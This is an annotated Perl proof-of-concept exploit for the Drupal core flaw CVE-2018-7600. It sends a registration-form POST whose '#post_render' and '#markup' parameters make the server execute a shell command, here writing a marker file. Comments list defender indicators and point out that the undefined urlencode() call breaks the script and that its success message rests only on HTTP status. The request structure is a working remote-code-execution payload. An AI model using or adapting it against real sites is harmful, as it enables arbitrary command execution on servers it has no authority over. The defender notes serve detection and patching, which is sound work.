CVE-2018-7600.pl
#!/usr/bin/perl
# Proof-of-concept request builder for CVE-2018-7600, the Drupal core flaw in
# which '#'-prefixed render-array properties supplied as request parameter
# names reach the renderer without sanitisation.
#
# Flow of the script as written:
#   1. read <target> and <drupal_path> from the command line;
#   2. build a URL for <drupal_path>/user/register with AJAX form query
#      parameters;
#   3. build a form body whose field names carry render-array properties
#      (#post_render, #type, #markup) and whose command writes a marker file;
#   4. POST it and print a verdict derived only from the HTTP status.
#
# Defender notes (all indicators below are taken from the literals in this file):
#   - Mitigation: run a Drupal core release that contains the fix for
#     CVE-2018-7600; consult the vendor advisory for the fixed versions.
#   - Web/WAF logs: POST to .../user/register with the query string
#     element_parents=account/mail/%23value, ajax_form=1 and
#     _wrapper_format=drupal_ajax.
#   - Request bodies: parameter names containing [#post_render], [#type] or
#     [#markup]. Presumably an ordinary browser submission of the registration
#     form never sends key names that begin with '#'; verify against normal
#     traffic before alerting on it.
#   - Host: an unexpected /tmp/vulnerable.txt owned by the web server account.
#
# NOTE(review): there is no `use strict;` / `use warnings;`, so every variable
# below is a package global and typos would go unreported.
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
# Fixed User-Agent claiming Firefox 3.6.13 on Windows. Because it is constant,
# it is a weak (trivially changed) log indicator for this exact script.
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13");
# Both arguments are used unvalidated and concatenated straight into the URL.
$target = $ARGV[0];
$drupal_path = $ARGV[1];
# The truthiness test also rejects the literal arguments "0" and "".
if(!$target || !$drupal_path) {
print "Usage: perl $0 <target> <drupal_path>\n";
print "Example: perl $0 www.example.com /drupal\n";
exit;
}
# Request URL: the registration form endpoint plus the AJAX query parameters
# that select the account/mail/#value element.
$exploit = $target . $drupal_path . "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax";
# Form body: '#'-prefixed keys under mail[...] name a post-render callback and
# its markup argument; the command shown only writes a marker file.
# NOTE(review): no definition or import of urlencode() is visible on this page
# and it is not a Perl builtin, so as shown this line presumably aborts at
# runtime before any request is sent.
$post_data = "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=" . urlencode("echo \"VULNERABLE\" > /tmp/vulnerable.txt");
$response = $ua->post($exploit, Content_Type => 'application/x-www-form-urlencoded', Content => $post_data);
# is_success only reports a 2xx HTTP status. It does not show that the server
# evaluated the injected keys or that the marker file exists, so the verdict
# printed here is unreliable in both directions and should not be used as
# evidence that a host is vulnerable or patched.
if($response->is_success) {
print "Exploit successful!\n";
print "Check /tmp/vulnerable.txt\n";
}
else {
print "Exploit failed.\n";
}